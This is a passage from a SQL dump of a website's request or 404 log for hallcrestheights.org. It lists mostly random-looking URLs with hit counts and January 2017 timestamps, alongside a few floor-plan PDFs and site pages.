00:00:00'),(4689,'http://www.hallcrestheights.org/pcscqruf-unpkw/k59990-xpoideot-i20162637-wtvsoar-mosm-gepla.htm',NULL,'','',1,0,'2017-01-13 00:15:08','0000-00-00 00:00:00'),(4690,'http://www.hallcrestheights.org/lugdltr-smxxhypz/i20162632-qjllzohn-k42478-jumntec-wfogyw.htm',NULL,'','',1,0,'2017-01-13 00:36:14','0000-00-00 00:00:00'),(4691,'http://www.hallcrestheights.org/vqjn-k42862-yspvhol-i20162634-jpeur/rtpilu-ourxivl-btrhnnmt-qzkowts.htm',NULL,'','',1,0,'2017-01-13 00:40:39','0000-00-00 00:00:00'),(4692,'http://www.hallcrestheights.org/i20162637-ixnmueah-k59590-whioz-hjxbnwpg-eyooayi/kuks-szqce-baqdom-ytni-holbdent.htm',NULL,'','',1,0,'2017-01-13 00:51:06','0000-00-00 00:00:00'),(4693,'http://www.hallcrestheights.org/kzpffm-sxklrded-hwge-fvbbg/k50439-zagp-eciyyuw-i20162632-uvfztji-gjina-mzbcng-tfml-yrghdfip/',NULL,'','',2,0,'2017-01-13 00:51:18','0000-00-00 00:00:00'),(4694,'http://www.hallcrestheights.org/fadlajfn-i20162635-lgfpc/k4550-vwgmyhde-cwxbdeu-dkov-fiibp.htm',NULL,'','',1,0,'2017-01-13 01:32:59','0000-00-00 00:00:00'),(4695,'http://www.hallcrestheights.org/k27895-yemb-jvhtqqd-ckzfltz/terqb-wnswn-i20162630-snjplpf-trrj/',NULL,'','',1,0,'2017-01-13 02:55:27','0000-00-00 00:00:00'),(4696,'http://www.hallcrestheights.org/cwhr-iwgpekz-qdwkvum-i20162629-zbsai/imjzf-ozgdvdd-qjvd-obknlykc-k27255-onedw-jmaxev-ortbz/',NULL,'','',2,0,'2017-01-13 02:58:08','0000-00-00 00:00:00'),(4697,'http://hallcrestheights.org/admin_login.php',NULL,'http://hallcrestheights.org','',11,0,'2017-01-13 03:15:36','0000-00-00 00:00:00'),(4698,'http://www.hallcrestheights.org/cwhriw-i20162633-gpekzqdw/kvum-k8639-zbsai/',NULL,'','',1,0,'2017-01-13 03:27:00','0000-00-00 00:00:00'),(4699,'http://www.hallcrestheights.org/vqjny-spvh/i20162636-k42134-oljp-eurrtpil-uourxivl-btrhnn.htm',NULL,'','',2,0,'2017-01-13 03:27:41','0000-00-00 00:00:00'),(4700,'http://www.hallcrestheights.org/uptt-mnbeatg/k862-rbnqc-dcncxr-i20162634-dhcpgzz.htm',NULL,'','',1,0,'2017-01-13 04:42:08','0000-00-00 00:00:00'),(4701,'http://www.hallcrestheights.org/i20162637-vqjnyspv-k60490-holjp-eurrtpil-uourxiv/lbtr-hnnmt-qzkowt-sxpp-bgrrcdsi.htm',NULL,'','',1,0,'2017-01-13 04:44:14','0000-00-00 00:00:00'),(4702,'http://www.hallcrestheights.org/fadlajfn-lgfpc/k50570-vwgmyhde-i20162631-cwxbdeu.htm',NULL,'','',1,0,'2017-01-13 04:45:54','0000-00-00 00:00:00'),(4703,'http://www.hallcrestheights.org/i20162628-vqjnyspv-holjp/k18890-eurrtpil-uourxiv.htm',NULL,'','',2,0,'2017-01-13 05:04:50','0000-00-00 00:00:00'),(4704,'http://www.hallcrestheights.org/dvisciwb-i20162637-vwkux/k60290-krbzomsm-vuclzup.htm',NULL,'','',2,0,'2017-01-13 05:07:45','0000-00-00 00:00:00'),(4705,'http://www.hallcrestheights.org/ixnmu-eahw/hioz-i20162633-hjxbnwpg-k934-eyooayik.htm',NULL,'','',1,0,'2017-01-13 05:19:59','0000-00-00 00:00:00'),(4706,'http://www.hallcrestheights.org/gnfznxvj-xpalt/k25550-itjshkyj-i20162635-yldpija.htm',NULL,'','',1,0,'2017-01-13 05:27:32','0000-00-00 00:00:00'),(4707,'http://www.hallcrestheights.org/hh-bradford-floor-plan.pdf',NULL,'','',53,0,'2017-01-13 05:36:05','0000-00-00 00:00:00'),(4708,'http://www.hallcrestheights.org/pcsc-qrufunp/k21562-kwxpo-ideotw-i20162634-tvsoarm.htm',NULL,'','',1,0,'2017-01-13 06:12:56','0000-00-00 00:00:00'),(4709,'http://hallcrestheights.org/hh-cavalier-floor-plan.pdf',NULL,'','',53,0,'2017-01-13 06:17:40','0000-00-00 00:00:00'),(4710,'http://www.hallcrestheights.org/xhajvql-k8023-wczbi-qsosqx/oqkgqa-qydcp-tznz-i20162631-vtjqoe/',NULL,'','',1,0,'2017-01-13 06:29:17','0000-00-00 00:00:00'),(4711,'http://www.hallcrestheights.org/hh-cavalier2-floor-plan.pdf',NULL,'','',53,0,'2017-01-13 06:52:08','0000-00-00 00:00:00'),(4712,'http://www.hallcrestheights.org/wbwp-k5755-bonkydh-xjjikvf/vtzpx-i20162629-bxkcw-jybtylw-osdu/',NULL,'','',1,0,'2017-01-13 06:59:31','0000-00-00 00:00:00'),(4713,'http://www.hallcrestheights.org/ixnmu-eahw/hioz-i20162633-hjxbnwpg-k17314-eyooayik.htm',NULL,'','',1,0,'2017-01-13 07:13:28','0000-00-00 00:00:00'),(4714,'http://www.hallcrestheights.org/dvisc-iwbv/i20162632-wkux-krbzomsm-k43234-vuclzuph.htm',NULL,'','',1,0,'2017-01-13 07:58:52','0000-00-00 00:00:00'),(4715,'http://www.hallcrestheights.org/cwhriwg-pekzq/dwkvum-i20162631-k7703-zbsaii/',NULL,'','',1,0,'2017-01-13 08:03:19','0000-00-00 00:00:00'),(4716,'http://www.hallcrestheights.org/i20162632-fadlajf-nlgfpcvw/k41678-gmyhdecw-xbdeudk.htm',NULL,'','',1,0,'2017-01-13 08:06:28','0000-00-00 00:00:00'),(4717,'http://www.hallcrestheights.org/i20162632-oiyizg-olrcmwfb-snop/dgfnh-skrl-jrgfctf-k50539-zfiwxwm/',NULL,'','',1,0,'2017-01-13 08:08:42','0000-00-00 00:00:00'),(4718,'http://hallcrestheights.org/hh-cavalier2-floor-plan.pdf',NULL,'','',54,0,'2017-01-13 08:09:00','0000-00-00 00:00:00'),(4719,'http://www.hallcrestheights.org/k54476-mrcqgb-i20162637-eifuwg-rabtnw-yrqs.htm',NULL,'','',7,0,'2017-01-13 08:47:42','0000-00-00 00:00:00'),(4720,'http://www.hallcrestheights.org/dvisciw-bvwkuxkr/bzomsmvu-i20162633-k178-clzuphv-qawuox.htm',NULL,'','',1,0,'2017-01-13 08:59:24','0000-00-00 00:00:00'),(4721,'http://www.hallcrestheights.org/zmkue-dtzj/k26114-ivyo-qxifgxuh-xptvuhmi-i20162633-wnzkor.htm',NULL,'','',1,0,'2017-01-13 09:03:11','0000-00-00 00:00:00'),(4722,'http://www.hallcrestheights.org/i20162634-jgle-tkymdrq/k662-znrvm-lkswaz-vkecqqn-eeiaqjzl.htm',NULL,'','',1,0,'2017-01-13 09:06:58','0000-00-00 00:00:00'),(4723,'http://www.hallcrestheights.org/edzv-k262-dlqcomn-nmmca-wvbfuj/apyvrlf-lxhqjkuh-i20162634-kcmumbh-mgznkohe-yrup.htm',NULL,'','',1,0,'2017-01-13 09:10:53','0000-00-00 00:00:00'),(4724,'http://www.hallcrestheights.org/dvisciwb-k36370-vwkux-krbzomsm-vuclzup/i20162632-hvqa-wuoxz-mnpzvs-gcrl-ycmczoqq.htm',NULL,'','',1,0,'2017-01-13 09:14:32','0000-00-00 00:00:00'),(4725,'http://www.hallcrestheights.org/dvis-k21862-ciwbvwk-uxkrb-zomsmv/uclzuph-vqawuoxz-i20162634-mnpzvsg-crlycmcz-oqqe.htm',NULL,'','',1,0,'2017-01-13 09:18:19','0000-00-00 00:00:00'),(4726,'http://www.hallcrestheights.org/fadlajf-nlgfpcvw-gmyhdecw-i20162633-xbdeudk/ovfiib-ptquh-zxchhrmx-agfp-k78-apuhgf-qvjd.htm',NULL,'','',1,0,'2017-01-13 09:22:06','0000-00-00 00:00:00'),(4727,'http://www.hallcrestheights.org/k18690-dvisciwb-vwkux-krbzomsm-vuclzup/hvqa-wuoxz-mnpzvs-gcrl-i20162628-ycmczoqq-eludpwcm.htm',NULL,'','',1,0,'2017-01-13 09:25:53','0000-00-00 00:00:00'),(4728,'http://www.hallcrestheights.org/k50370-pcscqruf-i20162631-unpkw-xpoideot-wtvsoar/mosm-gepla-lheliy-rqiy-qfufxvug-owopegtq.htm',NULL,'','',1,0,'2017-01-13 09:33:28','0000-00-00 00:00:00'),(4729,'http://www.hallcrestheights.org/k42834-jglet-kymd-rqzn-rvmlkswa/zvkecqqn-eeiaqj-i20162632-zlnpl-qfcneb-xilnv-oxbdjve-ebikptj.htm',NULL,'','',1,0,'2017-01-13 09:37:14','0000-00-00 00:00:00'),(4730,'http://www.hallcrestheights.org/tkuyk-fjdnjj/i20162634-bucyu-k43307-paja/',NULL,'','',1,0,'2017-01-13 09:41:01','0000-00-00 00:00:00'),(4731,'http://www.hallcrestheights.org/pcscqruf-unpkw-xpoideot-wtvsoar/mosm-k4350-gepla-lheliy-rqiy-qfufxvug-i20162635-owopegtq-amzimc.htm',NULL,'','',1,0,'2017-01-13 09:44:48','0000-00-00 00:00:00'),(4732,'http://www.hallcrestheights.org/zmkuedtz-jivyo-qxifgxuh-xptvuhm/iwnz-korpv-i20162632-ubfgnq-tpmh-k15870-prbikzon-mtlajhol-jrdklt.htm',NULL,'','',1,0,'2017-01-13 09:48:35','0000-00-00 00:00:00'),(4733,'http://www.hallcrestheights.org/vqjn-yspvhol-jpeur-rtpilu/ourxivl-btrhnnmt-qzkowts-k22062-xppbgrrc-i20162634-dsik-ibkxnpfo-vpyaybgo.htm',NULL,'','',1,0,'2017-01-13 09:56:09','0000-00-00 00:00:00'),(4734,'http://www.hallcrestheights.org/i20162628-kzpffm-sxklrded/hwge-k58499-fvbbg/',NULL,'','',1,0,'2017-01-13 09:59:56','0000-00-00 00:00:00'),(4735,'http://www.hallcrestheights.org/i20162628-edzvdlqc-omnnm-k19190-mcawvbfu-japyvrl/flxh-qjkuh-kcmumb-hmgz-nkoheyru-pxpudzik-musshe-qnrfwn.htm',NULL,'','',1,0,'2017-01-13 10:03:43','0000-00-00 00:00:00'),(4736,'http://www.hallcrestheights.org/vqjnyspv-holjp-k15770-eurrtpil-uourxiv/i20162632-lbtr-hnnmt-qzkowt-sxpp-bgrrcdsi-kibkxnpf-ovpyay-bgoynk.htm',NULL,'','',1,0,'2017-01-13 10:07:30','0000-00-00 00:00:00'),(4737,'http://www.hallcrestheights.org/joifa/formmail/office_seminar_2015_osaka.html',NULL,'','',3,0,'2017-01-13 10:11:17','0000-00-00 00:00:00'),(4738,'http://www.hallcrestheights.org/htxwhyk-rsvsv/hudykb-i20162631-k58823-qxdosf/',NULL,'','',1,0,'2017-01-13 10:15:04','0000-00-00 00:00:00'),(4739,'http://www.hallcrestheights.org/bsoapa-zapstasg/mhcq-cmckf-i20162629-k16099-rdtf/',NULL,'','',1,0,'2017-01-13 10:18:51','0000-00-00 00:00:00'),(4740,'http://www.hallcrestheights.org/nfrkop-dobbumgo/i20162632-lzes-rkwtz-k49939-qtqb/',NULL,'','',1,0,'2017-01-13 10:22:38','0000-00-00 00:00:00'),(4741,'http://www.hallcrestheights.org/about/public.html',NULL,'','',7,0,'2017-01-13 10:23:30','0000-00-00 00:00:00'),(4742,'http://www.hallcrestheights.org/soegsz-xyifetvt/ndyu-uhvfc-yzls-i20162633-k7439-xxqroxa/',NULL,'','',1,0,'2017-01-13 10:26:25','0000-00-00 00:00:00'),(4743,'http://www.hallcrestheights.org/oiyiz-i20162635-golrcm/wfbsn-opdg-fnhskrl-k1607-jrgfctfz/',NULL,'','',1,0,'2017-01-13 10:30:13','0000-00-00 00:00:00'),(4744,'http://www.hallcrestheights.org/cwhriwg-pekzq-k60223-dwkvum/zbsaii-mjzfo-zgdv-i20162631-ddqjvd/',NULL,'','',1,0,'2017-01-13 10:37:47','0000-00-00 00:00:00'),(4745,'http://www.hallcrestheights.org/qlbowci-ggece-ayafxr/glnikg-hhmbb-i20162630-k46723-xpge-smrcai/',NULL,'','',1,0,'2017-01-13 10:41:47','0000-00-00 00:00:00'),(4746,'http://www.hallcrestheights.org/htxwhyk-k45823-rsvsv-hudykb/qxdosf-ietyu-i20162630-aixn-rbdggs/',NULL,'','',1,0,'2017-01-13 10:45:20','0000-00-00 00:00:00'),(4747,'http://www.hallcrestheights.org/tkuykfj-dnjjb-ucyupa/jaylrl-wfvdy-k59323-ruqp-i20162631-klsdef/',NULL,'','',1,0,'2017-01-13 10:49:08','0000-00-00 00:00:00'),(4748,'http://www.hallcrestheights.org/k8239-yembjv-i20162633-htqqdckz-fltz/terqb-wnsw-nsnjplp-ftrrjnc/',NULL,'','',1,0,'2017-01-13 10:52:54','0000-00-00 00:00:00'),(4749,'http://www.hallcrestheights.org/cwhri-wgpekz-i20162634-qdwkv/umzb-k42907-saiimjz-fozgdvdd-qjvdobkn/',NULL,'','',1,0,'2017-01-13 10:56:41','0000-00-00 00:00:00'),(4750,'http://www.hallcrestheights.org/cwhriw-gpekzqdw-kvum/zbsai-imjz-i20162629-fozgdvd-dqjvdob-k15399-knlyk/',NULL,'','',1,0,'2017-01-13 11:00:28','0000-00-00 00:00:00'),(4751,'http://www.hallcrestheights.org/bsoap-azapst-asgmh/i20162635-cqcm-ckfrdtf-kgpvbchs-iwhorklv-k2007-zrtjrsy/',NULL,'','',1,0,'2017-01-13 11:04:15','0000-00-00 00:00:00'),(4752,'http://www.hallcrestheights.org/nfrkopd-k59923-obbum-golzes-i20162631-rkwtzq/tqbsv-jcwj-bxnmyv-sssldj-znaahjb/',NULL,'','',1,0,'2017-01-13 11:08:02','0000-00-00 00:00:00'),(4753,'http://www.hallcrestheights.org/tkuykf-k49339-jdnjjbuc-yupa-jaylr/i20162632-lwfv-dyruqpk-lsdefhx-dfpdf-ufpfaj/',NULL,'','',1,0,'2017-01-13 11:11:49','0000-00-00 00:00:00'),(4754,'http://www.hallcrestheights.org/cwhriw-gpekzqdw-kvum-zbsai/imjz-fozgdvd-dqjvdob-knlyk-i20162628-conedw-k58299-jmax/',NULL,'','',1,0,'2017-01-13 11:15:36','0000-00-00 00:00:00'),(4755,'http://www.hallcrestheights.org/nfrkopd-i20162631-obbum-golzes-k58623-rkwtzq/tqbsv-jcwj-bxnmyv-sssldj-znaahjb-kwxro/',NULL,'','',1,0,'2017-01-13 11:19:23','0000-00-00 00:00:00'),(4756,'http://www.hallcrestheights.org/wbwpbon-i20162631-kydhx-jjikvf-k59523-vtzpxb/xkcwj-ybty-lwosdu-ieqgws-ogxhgpi-sdhtn/',NULL,'','',1,0,'2017-01-13 11:23:10','0000-00-00 00:00:00'),(4757,'http://www.hallcrestheights.org/tkuyk-fjdnjj-bucyu-paja/ylrlwfv-i20162635-dyruqpkl-sdefhxdf-k1707-pdfufpf-ajnpvzat-tuxdw/',NULL,'','',1,0,'2017-01-13 11:26:57','0000-00-00 00:00:00'),(4758,'http://www.hallcrestheights.org/htxwhyk-rsvsv-hudykb-qxdosf/ietyu-i20162631-aixn-rbdggs-aarhef-k60123-skjydmr-ujwim-jqiaa/',NULL,'','',1,0,'2017-01-13 11:30:44','0000-00-00 00:00:00'),(4759,'http://www.hallcrestheights.org/wbwpbo-nkydhxjj-i20162628-ikvf-vtzpx/bxkc-k58899-wjybtyl-wosduie-qgwso-gxhgpi-sdht-nirmjhvz/',NULL,'','',1,0,'2017-01-13 11:34:31','0000-00-00 00:00:00'),(4760,'http://www.hallcrestheights.org/nfrko-pdobbu-mgolz-esrk/wtzqtqb-svjcwjbx-nmyvsssl-djznaah-k2307-jbkwxros-i20162635-holvg-wxkw/',NULL,'','',1,0,'2017-01-13 11:38:18','0000-00-00 00:00:00'),(4761,'http://www.hallcrestheights.org/htxwh-ykrsvs-vhudy-kbqx/dosfiet-yuaixnrb-k42807-dggsaarh-efskjyd-i20162634-mrujwimj-qiaau-rihc/',NULL,'','',1,0,'2017-01-13 11:42:05','0000-00-00 00:00:00'),(4762,'http://www.hallcrestheights.org/kzpffms-xklrd-edhwge-i20162631-fvbbgz/agpec-iyyu-wuvfzt-jigjin-amzbcng-tfmly-rghdf-k59123-ipwgdqrk/',NULL,'','',1,0,'2017-01-13 11:45:52','0000-00-00 00:00:00'),(4763,'http://www.hallcrestheights.org/xhajvql-wczbi-qsosqx-i20162631-oqkgqa/qydcp-tznz-vtjqoe-vpcaqw-jaluwty-bckbs-xbnbg-k60023-nndorcaj/',NULL,'','',1,0,'2017-01-13 11:49:41','0000-00-00 00:00:00'),(4764,'http://www.hallcrestheights.org/yembj-vhtqqd-ckzfl-tzte/rqbwnsw-nsnjplpf-trrjncyp-i20162635-joqwgzj-evihsdpa-caylh-yayz-k2207-eueizv/',NULL,'','',1,0,'2017-01-13 11:53:26','0000-00-00 00:00:00'),(4765,'http://www.hallcrestheights.org/i20162632-lugdltrs-mxxhy/k25370-pzqjllzo-hnjumnt.htm',NULL,'','',1,0,'2017-01-13 11:57:13','0000-00-00 00:00:00'),(4766,'http://www.hallcrestheights.org/i20162632-upttmnbe-atgrb/k47870-nqcdcncx-rdhcpgz.htm',NULL,'','',1,0,'2017-01-13 12:01:00','0000-00-00 00:00:00'),(4767,'http://www.hallcrestheights.org/edzvdlq-comnnmmc/i20162634-k4058-awvbfuja-pyvrlfl.htm',NULL,'','',1,0,'2017-01-13 12:04:47','0000-00-00 00:00:00'),(4768,'http://www.hallcrestheights.org/jgle-tkymdrq/k53962-znrvm-i20162633-lkswaz-vkecqqn.htm',NULL,'','',1,0,'2017-01-13 12:08:34','0000-00-00 00:00:00'),(4769,'http://www.hallcrestheights.org/i20162632-lugdltr-smxxhypz/k51578-qjllzohn-jumntec.htm',NULL,'','',2,0,'2017-01-13 12:12:22','0000-00-00 00:00:00'),(4770,'http://www.hallcrestheights.org/pcscq-rufu/npkw-i20162633-xpoideot-k11734-wtvsoarm.htm',NULL,'','',1,0,'2017-01-13 12:16:08','0000-00-00 00:00:00'),(4771,'http://www.hallcrestheights.org/jglet-kymd/i20162632-rqzn-rvmlkswa-k32434-zvkecqqn.htm',NULL,'','',1,0,'2017-01-13 12:19:55','0000-00-00 00:00:00'),(4772,'http://www.hallcrestheights.org/dvisciw-bvwkuxkr/i20162634-k25658-bzomsmvu-clzuphv.htm',NULL,'','',1,0,'2017-01-13 12:23:42','0000-00-00 00:00:00'),(4773,'http://www.hallcrestheights.org/i20162635-k38050-jgletkym-drqzn/rvmlkswa-zvkecqq-neei.htm',NULL,'','',1,0,'2017-01-13 12:27:29','0000-00-00 00:00:00'),(4774,'http://www.hallcrestheights.org/k58750-ryvhrhmq-tyysl/lgeajanp-dmefnxh-i20162634-qfhj.htm',NULL,'','',1,0,'2017-01-13 12:31:16','0000-00-00 00:00:00'),(4775,'http://www.hallcrestheights.org/k45970-edzvdlqc-omnnm/i20162632-mcawvbfu-japyvrl-flxh.htm',NULL,'','',1,0,'2017-01-13 12:35:03','0000-00-00 00:00:00'),(4776,'http://www.hallcrestheights.org/jglet-kymd/k7214-rqzn-rvmlkswa-zvkecqqn-i20162633-eeiaqj.htm',NULL,'','',1,0,'2017-01-13 12:38:50','0000-00-00 00:00:00'),(4777,'http://www.hallcrestheights.org/fadlajf-nlgfpcvw/gmyhdecw-k25558-xbdeudk-i20162634-ovfiib.htm',NULL,'','',1,0,'2017-01-13 12:42:37','0000-00-00 00:00:00'),(4778,'http://www.hallcrestheights.org/upttm-nbea/k31334-tgrb-nqcdcncx-i20162632-rdhcpgzz-dllimv.htm',NULL,'','',1,0,'2017-01-13 12:46:24','0000-00-00 00:00:00'),(4779,'http://www.hallcrestheights.org/mrcqg-beif/k12434-uwgr-abtnwyrq-semgwkow-i20162633-hmemxg.htm',NULL,'','',1,0,'2017-01-13 12:50:11','0000-00-00 00:00:00'),(4780,'http://www.hallcrestheights.org/i20162628-mrcqgbei-fuwgr/k8690-abtnwyrq-semgwko-whme-mxgku.htm',NULL,'','',1,0,'2017-01-13 12:53:58','0000-00-00 00:00:00'),(4781,'http://www.hallcrestheights.org/upttmnbe-atgrb/k50990-nqcdcncx-i20162637-rdhcpgz-zdll-imvyx.htm',NULL,'','',1,0,'2017-01-13 12:57:45','0000-00-00 00:00:00'),(4782,'http://www.hallcrestheights.org/i20162628-lugdltrs-mxxhy/k28490-pzqjllzo-hnjumnt-ecwf-ogywb.htm',NULL,'','',1,0,'2017-01-13 13:01:32','0000-00-00 00:00:00'),(4783,'http://www.hallcrestheights.org/i20162634-fadl-ajfnlgf/k32162-pcvwg-myhdec-wxbdeud-kovfiibp.htm',NULL,'','',1,0,'2017-01-13 13:05:19','0000-00-00 00:00:00'),(4784,'http://www.hallcrestheights.org/i20162634-gnfznxvj-xpalt/k56750-itjshkyj-yldpija-amdu-rtaen.htm',NULL,'','',1,0,'2017-01-13 13:09:07','0000-00-00 00:00:00'),(4785,'http://www.hallcrestheights.org/about/security.html',NULL,'','',7,0,'2017-01-13 13:11:24','0000-00-00 00:00:00'),(4786,'http://www.hallcrestheights.org/zmkuedtz-i20162635-jivyo/k15350-qxifgxuh-xptvuhm-iwnz-korpv.htm',NULL,'','',1,0,'2017-01-13 13:12:53','0000-00-00 00:00:00'),(4787,'http://www.hallcrestheights.org/edzvdlqc-omnnm/k39470-mcawvbfu-i20162631-japyvrl-flxh-qjkuh.htm',NULL,'','',1,0,'2017-01-13 13:16:40','0000-00-00 00:00:00'),(4788,'http://www.hallcrestheights.org/dvisciwb-vwkux/k25970-krbzomsm-vuclzup-i20162632-hvqa-wuoxz.htm',NULL,'','',1,0,'2017-01-13 13:20:27','0000-00-00 00:00:00'),(4789,'http://www.hallcrestheights.org/i20162634-pcscqruf-unpkw/k57650-xpoideot-wtvsoar-mosm-gepla.htm',NULL,'','',1,0,'2017-01-13 13:24:14','0000-00-00 00:00:00'),(4790,'http://www.hallcrestheights.org/jgletkym-drqzn/k26870-rvmlkswa-zvkecqq-i20162632-neei-aqjzl.htm',NULL,'','',1,0,'2017-01-13 13:31:48','0000-00-00 00:00:00'),(4791,'http://www.hallcrestheights.org/vqjnyspv-i20162635-holjp/k36050-eurrtpil-uourxiv-lbtr-hnnmt.htm',NULL,'','',1,0,'2017-01-13 13:35:35','0000-00-00 00:00:00'),(4792,'http://www.hallcrestheights.org/upttmnbe-i20162635-atgrb/k36950-nqcdcncx-rdhcpgz-zdll-imvyx.htm',NULL,'','',1,0,'2017-01-13 13:39:22','0000-00-00 00:00:00'),(4793,'http://www.hallcrestheights.org/i20162634-upttmnb-eatgrbnq/k4658-cdcncxrd-hcpgzzd-llimvy-xjltf.htm',NULL,'','',1,0,'2017-01-13 13:43:09','0000-00-00 00:00:00'),(4794,'http://www.hallcrestheights.org/ixnmuea-hwhiozhj/k9878-xbnwpgey-ooayiku-ksszqc-i20162633-ebaqd.htm',NULL,'','',1,0,'2017-01-13 13:46:57','0000-00-00 00:00:00'),(4795,'http://www.hallcrestheights.org/i20162632-vqjny-k33034-spvh-oljp/eurrtpil-uourxivl-btrhnn-mtqzk.htm',NULL,'','',1,0,'2017-01-13 13:50:43','0000-00-00 00:00:00'),(4796,'http://www.hallcrestheights.org/gnfznxv-jxpaltit/k31478-jshkyjyl-dpijaam-i20162632-durtae-npggw.htm',NULL,'','',1,0,'2017-01-13 13:54:31','0000-00-00 00:00:00'),(4797,'http://www.hallcrestheights.org/edzvdlq-comnnmmc/k30578-awvbfuja-pyvrlfl-i20162632-xhqjku-hkcmu.htm',NULL,'','',1,0,'2017-01-13 13:58:17','0000-00-00 00:00:00'),(4798,'http://www.hallcrestheights.org/lugdltrs-mxxhy-pzqjllzo/i20162635-hnjumnt-ecwf-k17050-ogywb-iwyrur.htm',NULL,'','',1,0,'2017-01-13 14:02:05','0000-00-00 00:00:00'),(4799,'http://www.hallcrestheights.org/i20162632-ryvhrhmq-tyysl-k26770-lgeajanp/dmefnxh-qfhj-dyhao-xrcjhw.htm',NULL,'','',1,0,'2017-01-13 14:05:52','0000-00-00 00:00:00'),(4800,'http://www.hallcrestheights.org/lugd-ltrsmxx-i20162634-hypzq/jllzoh-njumnte-cwfogywb-k32962-iwyrurf.htm',NULL,'','',1,0,'2017-01-13 14:09:38','0000-00-00 00:00:00'),(4801,'http://www.hallcrestheights.org/k53662-ixnm-i20162633-ueahwhi-ozhjx/bnwpge-yooayik-uksszqce-baqdomy.htm',NULL,'','',1,0,'2017-01-13 14:13:25','0000-00-00 00:00:00'),(4802,'http://www.hallcrestheights.org/i20162632-edzvdlqc-omnnm-mcawvbfu/japyvrl-flxh-qjkuh-k5670-kcmumb-hmgz.htm',NULL,'','',1,0,'2017-01-13 14:17:12','0000-00-00 00:00:00'),(4803,'http://www.hallcrestheights.org/lugdl-k42634-trsm-xxhy-pzqjllzo/hnjumnte-cwfogy-wbiwy-rurfgv-i20162636-fcwqz.htm',NULL,'','',1,0,'2017-01-13 14:20:02','0000-00-00 00:00:00'),(4804,'http://www.hallcrestheights.org/cwhri-wgpekz-qdwkv-umzb/saiimjz-fozgdvdd-qjvdobkn-lykcone-k22107-dwjmaxev-i20162635-ortbz-qsax/',NULL,'','',1,0,'2017-01-13 14:20:56','0000-00-00 00:00:00'),(4805,'http://www.hallcrestheights.org/lugdl-i20162633-trsm-k26514-xxhy/pzqjllzo-hnjumnte-cwfogy-wbiwy-rurfgv.htm',NULL,'','',1,0,'2017-01-13 14:20:59','0000-00-00 00:00:00'),(4806,'http://www.hallcrestheights.org/i20162632-pcscq-rufu-npkw/xpoideot-wtvsoarm-osmgep-k53334-lalhe-liyrqi.htm',NULL,'','',1,0,'2017-01-13 14:24:46','0000-00-00 00:00:00'),(4807,'http://www.hallcrestheights.org/i20162632-upttm-nbea-tgrb/nqcdcncx-rdhcpgzz-dllimv-k49014-yxjlt-feobke.htm',NULL,'','',1,0,'2017-01-13 14:28:33','0000-00-00 00:00:00'),(4808,'http://www.hallcrestheights.org/zmkuedtz-jivyo-k16650-qxifgxuh/i20162635-xptvuhm-iwnz-korpv-ubfgnq-tpmh.htm',NULL,'','',1,0,'2017-01-13 14:32:20','0000-00-00 00:00:00'),(4809,'http://www.hallcrestheights.org/upttmnbe-atgrb-k28890-nqcdcncx/rdhcpgz-i20162628-zdll-imvyx-jltfeo-bkeb.htm',NULL,'','',1,0,'2017-01-13 14:36:07','0000-00-00 00:00:00'),(4810,'http://www.hallcrestheights.org/lugdltrs-mxxhy-pzqjllzo/hnjumnt-i20162628-ecwf-ogywb-k29790-iwyrur-fgvf.htm',NULL,'','',1,0,'2017-01-13 14:43:41','0000-00-00 00:00:00'),(4811,'http://www.hallcrestheights.org/edzvdlq-i20162633-comnnmmc-awvbfuja/pyvrlfl-xhqjku-hkcmu-k9778-mbhmgznk.htm',NULL,'','',1,0,'2017-01-13 14:47:28','0000-00-00 00:00:00'),(4812,'http://www.hallcrestheights.org/pcscqru-k4558-funpkwxp-i20162634-oideotwt/vsoarmo-smgepl-alhel-iyrqiyqf.htm',NULL,'','',1,0,'2017-01-13 14:51:15','0000-00-00 00:00:00'),(4813,'http://www.hallcrestheights.org/jgletky-mdrqznrv-i20162634-k25258-mlkswazv/kecqqne-eiaqjz-lnplq-fcnebxil.htm',NULL,'','',1,0,'2017-01-13 14:55:02','0000-00-00 00:00:00'),(4814,'http://www.hallcrestheights.org/i20162632-fadlajf-nlgfpcvw-gmyhdecw/xbdeudk-ovfiib-k52078-ptquh-zxchhrmx.htm',NULL,'','',1,0,'2017-01-13 14:58:49','0000-00-00 00:00:00'),(4815,'http://www.hallcrestheights.org/i20162632-dvisciw-bvwkuxkr-bzomsmvu/clzuphv-k31378-qawuox-zmnpz-vsgcrlyc.htm',NULL,'','',1,0,'2017-01-13 15:02:36','0000-00-00 00:00:00'),(4816,'http://www.hallcrestheights.org/fadla-k32734-jfnl-gfpc-vwgmyhde/i20162632-cwxbdeud-kovfii-bptqu-hzxchh-rmxag.htm',NULL,'','',1,0,'2017-01-13 15:06:23','0000-00-00 00:00:00'),(4817,'http://www.hallcrestheights.org/vqjny-k52534-spvh-oljp-eurrtpil/i20162632-uourxivl-btrhnn-mtqzk-owtsxp-pbgrr.htm',NULL,'','',1,0,'2017-01-13 15:10:11','0000-00-00 00:00:00'),(4818,'http://www.hallcrestheights.org/xhajvql-i20162631-wczbi-qsosqx-k7503-oqkgqa/qydcp-tznz-vtjqoe-vpcaqw-jaluwty-bckbs/',NULL,'','',1,0,'2017-01-13 15:10:42','0000-00-00 00:00:00'),(4819,'http://www.hallcrestheights.org/soeg-szxyife/i20162630-tvtndyu-uhvfc-yzlsx-k27095-xqroxae/',NULL,'','',1,0,'2017-01-13 15:10:43','0000-00-00 00:00:00'),(4820,'http://www.hallcrestheights.org/ryvhrhmq-k46270-tyysl-lgeajanp-dmefnxh/i20162632-qfhj-dyhao-xrcjhw-uvds-vezytwlc.htm',NULL,'','',1,0,'2017-01-13 15:13:57','0000-00-00 00:00:00'),(4821,'http://www.hallcrestheights.org/i20162628-ryvhrhmq-k29890-tyysl-lgeajanp-dmefnxh/qfhj-dyhao-xrcjhw-uvds-vezytwlc.htm',NULL,'','',1,0,'2017-01-13 15:25:18','0000-00-00 00:00:00'),(4822,'http://www.hallcrestheights.org/fadl-k54262-ajfnlgf-pcvwg-myhdec/wxbdeud-i20162633-kovfiibp-tquhzxc-hhrmxagf-papu.htm',NULL,'','',1,0,'2017-01-13 15:29:05','0000-00-00 00:00:00'),(4823,'http://www.hallcrestheights.org/dvis-k10162-ciwbvwk-uxkrb-zomsmv/uclzuph-vqawuoxz-i20162634-mnpzvsg-crlycmcz-oqqe.htm',NULL,'','',1,0,'2017-01-13 15:32:52','0000-00-00 00:00:00'),(4824,'http://www.hallcrestheights.org/jgletky-k51778-mdrqznrv-mlkswazv-kecqqne/i20162632-eiaqjz-lnplq-fcnebxil-nvox-bdjvee.htm',NULL,'','',1,0,'2017-01-13 